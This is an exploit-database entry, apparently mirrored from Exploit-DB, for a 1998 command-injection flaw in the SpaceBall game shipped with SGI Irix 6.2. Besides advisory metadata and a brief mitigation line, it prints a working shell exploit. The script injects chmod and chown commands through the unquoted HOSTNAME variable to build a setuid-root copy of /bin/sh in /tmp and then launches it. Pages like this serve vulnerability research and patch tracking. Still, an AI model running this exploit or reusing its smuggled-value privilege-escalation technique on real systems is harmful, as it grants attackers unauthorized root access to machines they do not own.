header-logo
Suggest Exploit
vendor:
SpaceBall
by:
SecurityFocus
7.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: SpaceBall
Affected Version From: Irix 6.2
Affected Version To: Irix 6.2
Patch Exists: YES
Related CWE: CVE-1998-0206
CPE: o:sgi:irix:6.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
1998

SpaceBall Game Security Hole

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands. An attacker can use this vulnerability to gain root privileges on the system.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in system commands.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/471/info

The SpaceBall game, shipped with Irix 6.2 from Silicon Graphics contains a security hole which could result in the compromise of the root account. By blindly taking the contents of the $HOSTNAME variable, and not placing quotes around it, the spaceball.sh program can be made to execute commands.

#!/bin/sh
SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh
echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" $SWDIR/spaceball > /dev/null 2>&1
/tmp/sh

Navigation

Suggest Exploit

Services By CQR